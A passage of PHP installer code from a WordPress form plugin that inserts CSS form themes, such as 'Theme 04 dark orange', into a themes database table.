#555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\nbackground: #FA8072;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #FFABA1;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #FF9689;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #FF9A8E;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #FA8072;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF8F83; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F7B4AC), color-stop(39%, #F89F95), color-stop(100%, #FF8F83)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #F7B4AC 0%, #F89F95 39%, #FF8F83 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/04/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(13, \'Theme 04 dark orange\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #F6CE9D;\r\nmargin-bottom: 10px;\r\ncolor: #F6CE9D;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #424242 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6CE9D;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/01/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\n	padding: 13px;\r\n	text-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	